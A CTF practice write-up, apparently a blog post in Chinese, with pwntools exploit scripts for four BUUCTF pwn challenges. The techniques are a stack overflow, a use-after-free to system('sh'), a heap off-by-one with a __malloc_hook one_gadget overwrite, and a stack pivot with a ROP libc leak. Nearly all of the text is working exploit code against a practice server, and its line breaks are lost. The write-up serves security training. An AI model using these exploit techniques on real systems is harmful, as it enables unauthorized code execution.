PWN-PRACTICE-BUUCTF-14

• • bbys_tu_2016
  • ciscn_2019_n_3
  • roarctf_2019_easy_pwn
  • gyctf_2020_borrowstack

bbys_tu_2016

棧溢出，覆蓋eip到printFlag函數

from pwn import * #io=process('./bbys_tu_2016') io=remote('node4.buuoj.cn',27817) elf=ELF('./bbys_tu_2016') #io.recvuntil('feed it.\n') payload='a'*(24)+p32(0x0804856D) io.sendline(payload) io.interactive()

ciscn_2019_n_3

參考：[BUUCTF]PWN——ciscn_2019_n_3

from pwn import * #context.log_level="debug" io=remote("node4.buuoj.cn",29097) #io=process("./ciscn_2019_n_3") elf=ELF("./ciscn_2019_n_3")def new(index,btype,cont,cont_len=0):io.sendlineafter("CNote > ","1")io.sendlineafter("Index > ",str(index))if btype==1:io.sendlineafter("Type > ",str(btype))io.sendlineafter("Value > ",cont)else:io.sendlineafter("Type > ",str(btype))io.sendlineafter("Length > ",str(cont_len))io.sendlineafter("Value > ",cont) def delete(index):io.sendlineafter("CNote > ","2")io.sendlineafter("Index > ",str(index)) def show(index):io.sendlineafter("CNote > ","3")io.sendlineafter("Index > ",str(index))#gdb.attach(io) #pause()new(0,1,"1") new(1,1,"1") new(2,1,"1")#pause()delete(0) delete(1)#pause()system_plt=elf.plt["system"] print(hex(system_plt)) payload="sh\x00\x00"+p32(system_plt) new(3,2,payload,0xc)#pause()delete(0)io.interactive()

roarctf_2019_easy_pwn

參考：【pwn】roarctf_2019_easy_pwn

from pwn import * #context.log_level="debug" #io=process("./roarctf_2019_easy_pwn") io=remote("node4.buuoj.cn",28680) elf=ELF("./roarctf_2019_easy_pwn") libc=ELF("./libc-2.23-16-x64.so") def create(size):io.sendlineafter("choice: ","1")io.sendlineafter("size: ",str(size)) def write(index,size,content):io.sendlineafter("choice: ","2")io.sendlineafter("index: ",str(index))io.sendlineafter("size: ",str(size))io.sendlineafter("content: ",content) def drop(index):io.sendlineafter("choice: ","3")io.sendlineafter("index: ",str(index)) def show(index):io.sendlineafter("choice: ","4")io.sendlineafter("index: ",str(index))#gdb.attach(io) #pause()create(0x18)#chunk0 create(0x18)#chunk1 create(0x88)#chunk2 create(0x88)#chunk3 create(0x28)#chunk4 create(0x28)#chunk5 create(0x68)#chunk6#pause()write(0,0x18+10,"a"*0x18+p8(0xb1)) drop(1)#pause()create(0xa8)#chunk1 write(1,0x20,"a"*0x18+p64(0x91))#pause()drop(2) show(1) io.recvuntil("content: ") io.recv(0x20) libc_base=u64(io.recv(8))-0x3C4B78 print(hex(libc_base)) malloc_hook=libc_base+libc.sym["__malloc_hook"] realloc=libc_base+libc.sym["__libc_realloc"] libc_one_gadget=[0x45216,0x4526a,0xf02a4,0xf1147] one_gadget=libc_base+libc_one_gadget[1]#pause()write(4,0x28+10,"a"*0x28+p8(0xa1)) drop(5) drop(6)#pause()create(0x98)#chunk2 payload="a"*0x28+p64(0x71)+p64(malloc_hook-0x23) write(2,len(payload),payload)#pause()create(0x68)#chunk5 create(0x68)#chunk6 payload="a"*(0x13-8)+p64(one_gadget)+p64(realloc+0x10) write(6,len(payload),payload)#pause()create(0x88)io.interactive()

gyctf_2020_borrowstack

棧遷移，到.bss段
但是要盡量往高地址處遷移，避免再次執行main函數時，申請的臨時變量的空間覆蓋got表

from pwn import * #context.log_level='debug' #io=process('./gyctf_2020_borrowstack') io=remote('node4.buuoj.cn',25331) elf=ELF('./gyctf_2020_borrowstack') libc=ELF('./libc-2.23-x64.so') bank_addr=0x601080 leave_ret=0x400699 pop_rdi=0x400703 ret=0x4004c9 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main_addr=elf.sym['main'] io.recvuntil('what you want\n') payload0='a'*(0x60)+p64(bank_addr)+p64(leave_ret) io.send(payload0) io.recvuntil('stack now!\n') payload1=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) io.send(payload1) puts_addr=u64(io.recv(6).ljust(8,'\x00')) print(hex(puts_addr)) libc_base=puts_addr-libc.sym['puts'] ones=[0x45216,0x4526a,0xf02a4,0xf1147] onegadget=libc_base+ones[1] io.recvuntil('you want\n') payload2='a'*(0x60+8)+p64(onegadget) io.send(payload2) io.recvuntil('stack now!') io.send('1') io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-14的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。